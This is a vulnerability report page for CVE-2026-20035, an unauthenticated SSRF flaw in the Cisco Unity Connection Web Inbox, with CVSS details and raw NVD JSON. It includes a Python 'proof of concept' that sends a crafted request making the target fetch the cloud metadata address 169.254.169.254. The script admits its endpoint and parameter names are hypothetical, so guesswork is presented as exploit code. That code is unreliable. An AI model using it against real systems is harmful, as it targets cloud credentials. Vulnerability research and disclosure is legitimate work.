Security Vulnerability Report
中文
CVE-2026-20035 CVSS 7.2 HIGH

CVE-2026-20035

Published: 2026-05-06 17:16:20
Last Modified: 2026-05-06 18:59:53
Source: [email protected]

Description

A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device. This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Cisco Unity Connection Web Inbox (具体受影响版本请参考Cisco官方公告cisco-sa-unity-rce-ssrf-hENhuASy)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Proof of Concept for CVE-2026-20035 # Target: Cisco Unity Connection Web Inbox # Description: This script demonstrates how an unauthenticated attacker might trigger the SSRF vulnerability. TARGET_URL = "http://<target-ip>/webinbox/vulnerable_endpoint" # Example internal URL to access (e.g., AWS metadata, internal admin panel) MALICIOUS_URL = "http://169.254.169.254/latest/meta-data/" def exploit_ssrf(): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded" } # Payload structure based on the vulnerability description (parameter names are hypothetical) payload = { "target": MALICIOUS_URL, "action": "import" } try: print(f"[*] Sending SSRF request to {TARGET_URL}...") response = requests.post(TARGET_URL, data=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully!") print("[+] Response from server:") print(response.text[:500]) # Print first 500 chars of response else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit_ssrf()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20035", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:20.280", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the web UI of Cisco Unity Connection Web Inbox could allow an unauthenticated, remote attacker to conduct SSRF attacks through an affected device.\r\n\r\nThis vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-unity-rce-ssrf-hENhuASy", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.